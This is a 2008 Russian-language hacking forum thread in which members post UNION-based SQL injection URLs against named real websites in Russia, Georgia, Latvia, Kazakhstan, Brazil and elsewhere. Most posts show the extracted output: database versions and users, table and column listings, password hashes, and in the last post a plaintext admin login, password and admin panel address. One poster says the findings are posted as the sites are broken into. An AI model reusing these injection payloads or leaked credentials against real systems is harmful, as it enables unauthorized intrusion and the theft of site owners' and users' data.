HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.08.2008, 20:53
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами: 9384053

Репутация: 303
По умолчанию

http://www.pc-olymp.ru/admin/ - стандартно
 
Ответить с цитированием

  #2  
Старый 09.08.2008, 21:30
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами: 9384053

Репутация: 303
По умолчанию

http://www.gorobzor.ru/articles/view?id=1+union+select+concat(username,0x3a3a,user _password,0x3a3a)+from+forum.users+limit+1,10/*

Login Goodman
Pass: $H$9j04UOE51YElZky1aSdrq8t8ekKETZ/

Черти, потрудились бы грамотно фреймворк изучить...
 
Ответить с цитированием

  #3  
Старый 09.08.2008, 21:33
Heavy Metal
Новичок
Регистрация: 16.09.2007
Сообщений: 25
С нами: 9816424

Репутация: 62
По умолчанию

www.accuratelimited.com
Код:
http://www.accuratelimited.com/entry_detail.php?entry_id=-1+union+select+1,2,3,concat_ws(0x3a,id,user_login,user_pass)+from+wp_users&entry_type=insight
www.airquality.co.uk
Код:
http://www.airquality.co.uk/archive/laqm/laqm.php?action=submit&map_name=wmid&la_id=-1+union+select+concat_ws(0x3a,user,password),2,3,4+from+mysql.user
www.hanwha.com.tw
Код:
http://www.hanwha.com.tw/hardware_detail.php?hard_id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database()),6,7,8,9,10,11,12,13,14,15
 
Ответить с цитированием

  #4  
Старый 09.08.2008, 21:42
WAR!9G
Участник форума
Регистрация: 24.06.2007
Сообщений: 299
С нами: 9937288

Репутация: 212
По умолчанию

Цитата:
Жесть! login: admin Password: admin - ЛОЛ! ЛОЛ! ЛОЛ! Админа в жертву неграм-гомосексуалистим!!!!
Автор строк, почему бы не объеденить сообщения в одно, а не постить по 15 раз подряд?

http://www.i-veikals.lv/?lapa=prod&group=1+union+select+1,2/*&lang=lv
http://www.i-veikals.lv/?lapa=prod&group=1+union+select+1,database()/*&lang=lv
http://www.i-veikals.lv/lapa=prod&group=1+union+select+1,table_name/**/from/**/
information_schema.tables/*&lang=lv

VERSION: 5.0.22
USER: new@hosting.lathost.net
DATABASE: pplhlv_proj

http://www.belarus.kz/index.php?p=1+union+select+1,2,3,4,5,6,7/*
http://www.belarus.kz/index.php?p=1+union+select+1,database(),3,4,5,6,7/*
http://www.belarus.kz/index.php?p=1+union+select+1,2,3,4,5,6,7/**/from/**/news/*

VERSION:4.1.22
USER:brlarusbase@localhost
DATABASE:belarusbase
 
Ответить с цитированием

Зы
  #5  
Старый 09.08.2008, 21:43
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами: 9384053

Репутация: 303
По умолчанию Зы

Дык походу дела как ломал - так и постил)
 
Ответить с цитированием

  #6  
Старый 09.08.2008, 22:38
B1ade
Познающий
Регистрация: 25.04.2008
Сообщений: 43
С нами: 9496707

Репутация: 54
По умолчанию

Код:
http://junior.eurovision-georgia.ge/index.php?lang=eng&topid=3&id=-1+union+select+1,2,3,4,5/*
Код:
http://imi.ge/index.php?page=movie&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
Код:
http://www.molhsa.ge/index.php?act=full&Id=1274&catId=-1+union+select+1,2,3,4,5,6/*
 
Ответить с цитированием

  #7  
Старый 10.08.2008, 00:07
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
С нами: 9483229

Репутация: 1160
По умолчанию

Цитата:
http://www.molhsa.ge/index.php?act=full&Id=1274&catId=-1+union+select+1,2,3,4,5,6/*
Цитата:
http://www.molhsa.ge/index.php?act=full&Id=1274&catId=-1+union+select+1,2,3,concat_ws(0x3a,username,pass, admin),5,6+from+moh_auth+limit+0,10/*
Цитата:
http://www.molhsa.ge/index.php?act=full&Id=1274&catId=-1+union+select+1,2,3,column_name,5,6+from+informat ion_schema.columns+where+table_name=0x6d6f685f6175 7468+limit+3,10/*

moh:de8d1369b56cd8193ee55d4a8532184c:1

Код HTML:
http://www.molhsa.ge/phpmyadmin/
 
Ответить с цитированием

  #8  
Старый 10.08.2008, 02:37
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами: 9806786

Репутация: 869
По умолчанию

Код:
http://www.hereandnow.ru/index.php?ids=1%20UNION%20SELECT%201,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7%20LIMIT%201,1/*
Цитата:
4.1.22:hereandnow:hereandnow@localhost
 
Ответить с цитированием

  #9  
Старый 10.08.2008, 00:14
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами: 11020706

Репутация: 4693


По умолчанию

http://presa.ge/index.php?text=archive&date=-11+union+select+1,2,table_name,4,5,6+from+informat ion_schema.tables--

user: presa_ge@localhost
dbname: presa_ge
version: 5.0.51

http://presa.ge/index.php?text=archive&date=-11+union+select+1,2,concat_ws(0x3a,id,user_usernam e,user_password,user_group),4,5,6+from+users+--

44resa.ge:c1ab283404b71a940807009023a764bd:1

P.S.
Админку найти не могу..
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 10.08.2008 в 00:46..
 
Ответить с цитированием

  #10  
Старый 10.08.2008, 00:32
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
С нами: 9483229

Репутация: 1160
По умолчанию

Qwazar,сорри,я просто,не увидел,Что ты хэшик вытащил...АА...я первее хэш вытащил))
Цитата:
Сообщение от Qwazar  
http://presa.ge/index.php?text=archive&date=-11+union+select+1,2,table_name,4,5,6+from+informat ion_schema.tables--

user: presa_ge@localhost
dbname: presa_ge
version: 5.0.51
TAbles:
Цитата:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
menu_tree
news
page_types
user_group
users
--id
--user_username
--user_password
--user_firstname
--user_lastname
--user_email
--user_group
Цитата:
http://presa.ge/index.php?text=archive&date=-11+union+select+1,2,column_name,4,5,6+from+informa tion_schema.columns+where+table_name=0x7573657273--
presa.ge:c1ab283404b71a940807009023a764bd:xx@XX.xx
******************************************
abs-tech.com
Цитата:
SQL-injection
http://www.abs-tech.com/produto.php?id_produto=376+union+select+1,2,3,4,5, 6
Цитата:
http://www.abs-tech.com/produto.php?id_produto=376+union+select+1,concat_w s(0x3a,version(),user()),3,4,5,6
Version:5.0.51-locaweb-log
User:abs_tech1@200.234.200.132
Цитата:
http://www.abs-tech.com/produto.php?id_produto=376+union+select+1,table_na me,3,4,5,6+from+information_schema.tables
Tables:
tb_fornecedores
tb_mais_informacoes
tb_noticias_arquivos
tb_tickers
tb_downloads
tb_links
tb_noticias
tb_produtos
tb_institucional
tb_menu
tb_novidades
tb_usuario
--email
--nivel
--id_usuario
--senha
--nome
Цитата:
http://www.abs-tech.com/produto.php?id_produto=376+union+select+1,concat_w s(0x3a,id_usuario,email,nivel,senha,nome),3,4,5,6+ from+tb_usuario
1:w3:1:radum123:W3 Criações
http://www.abs-tech.com/admin/
login:w3
password:radium123
Но я там оказался не одним из первых:

Последний раз редактировалось DDoSька; 10.08.2008 в 02:01..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.